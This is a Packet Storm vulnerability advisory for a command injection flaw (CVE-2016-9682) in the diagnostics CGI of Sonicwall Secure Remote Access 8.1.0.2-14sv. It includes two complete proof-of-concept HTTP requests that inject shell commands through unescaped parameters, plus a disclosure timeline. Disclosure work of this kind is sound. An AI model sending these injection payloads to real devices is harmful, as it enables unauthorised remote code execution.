Lucene search
Russell SanfordPACKETSTORM:143418HistoryJul 19, 2017 - 12:00 a.m.
Sonicwall Secure Remote Access (SRA) 8.1.0.2-14sv Command Injection
2017-07-1900:00:00
Russell Sanford
packetstormsecurity.com
46
0.059 Low
EPSS
Percentile
93.5%
`Sonicwall Secure Remote Access (SRA) - Command Injection Vulnerabilities
Vendor: Sonicwall (Dell)
Product: Secure Remote Access (SRA)
Version: 8.1.0.2-14sv
Platform: Embedded Linux
Discovery: Russell Sanford of Critical Start (www.CriticalStart.com)
CVE: cve-2016-9682
Tested against version 8.1.0.2-14sv on 11/28/16 (fully updated)
Description:
The Sonicwall Secure Remote Access server (ver 8.1.0.2-14sv) is vulnerable to two Remote Command Injection vulnerabilities in it's
web administrative interface. These vulnerabilies occur in the diagnostics CGI (/cgi-bin/diagnostics) component responsible for
emailing out information about the state of the system. The application doesn't properly escape the information passed in the 'tsrDeleteRestartedFile'
or 'currentTSREmailTo' variables before making a call to system() allowing for remote command injection.
Exploitation of this vulnerability yeilds shell access to the remote machine under the useraccount 'nobody'
Impact:
Remote Code Execution
Exploit #1 -----------------------------------------------------------------
GET /cgi-bin/diagnostics?tsrEmailCurrent=true¤tTSREmailTo=|date>/tmp/xort||a%20%23 HTTP/1.1
Host: 192.168.84.155
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://192.168.84.155/cgi-bin/diagnostics
Cookie: SessURL=https%3A%2F%2F192.168.84.155%2Fcgi-bin%2Fwelcome; svDomainName=LocalDomain; activeUserSessionsTable=0; ajaxUpdates=ON; activeNxSessionsTable=0; servicesBookmarksTable=1; policyListTable=1; portalListTable=1; domainListTable=0; period=1; activeTab=4; curUrl=license; swap=dEVySFNhTXl5V3NLSXNWUFUzVzBNNTJJQ1o2WXpCODNrOGZYUGxYazJOZz0=
Exploit #2 -----------------------------------------------------------------
GET /cgi-bin/diagnostics?tsrDeleteRestarted=true&tsrDeleteRestartedFile=|date>/tmp/xort2||a%20%23 HTTP/1.1
Host: 192.168.84.155
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://192.168.84.155/cgi-bin/diagnostics
Cookie: SessURL=https%3A%2F%2F192.168.84.155%2Fcgi-bin%2Fwelcome; svDomainName=LocalDomain; activeUserSessionsTable=0; ajaxUpdates=ON; activeNxSessionsTable=0; servicesBookmarksTable=1; policyListTable=1; portalListTable=1; domainListTable=0; period=1; activeTab=4; curUrl=sslcert; swap=dDdWMjhSYzlzMEZBd3kwQ29rTzZxQWFKdmxUSU5SRFVBQTRGRWk5UzJXVT0=
Timeline:
11/14/16 - Discovered in audit
11/20/16 - POC msf exploit written
11/28/16 - Contacted mitre for CVE
11/30/16 - CVE received from mitre (CVE-2016-9682)
11/30/16 - Dell notified through Sonicwall vuln reporting
`
Related
dsquare
dsquare
Dell SonicWALL Secure Remote Access diagnostics RCE
2017-05-22 00:00:00
zdt
zdt
nvd
nvd
CVE-2016-9682
2017-02-22 05:59:00
cve
cve
CVE-2016-9682
2017-02-22 05:59:00
checkpoint_advisories
checkpoint_advisories
SonicWall Secure Remote Access Server Command Injection (CVE-2016-9682)
2020-12-06 00:00:00
prion
prion
Command injection
2017-02-22 05:59:00
exploitpack
exploitpack
Sonicwall Secure Remote Access 8.1.0.2-14sv - Command Injection
2017-07-19 00:00:00
cvelist
cvelist
CVE-2016-9682
2017-02-22 05:00:00
exploitdb
exploitdb
Sonicwall Secure Remote Access 8.1.0.2-14sv - Command Injection
2017-07-19 00:00:00
openvas
openvas
Dell SonicWALL Secure Remote Access (SRA) Multiple RCE Vulnerabilities
2017-07-24 00:00:00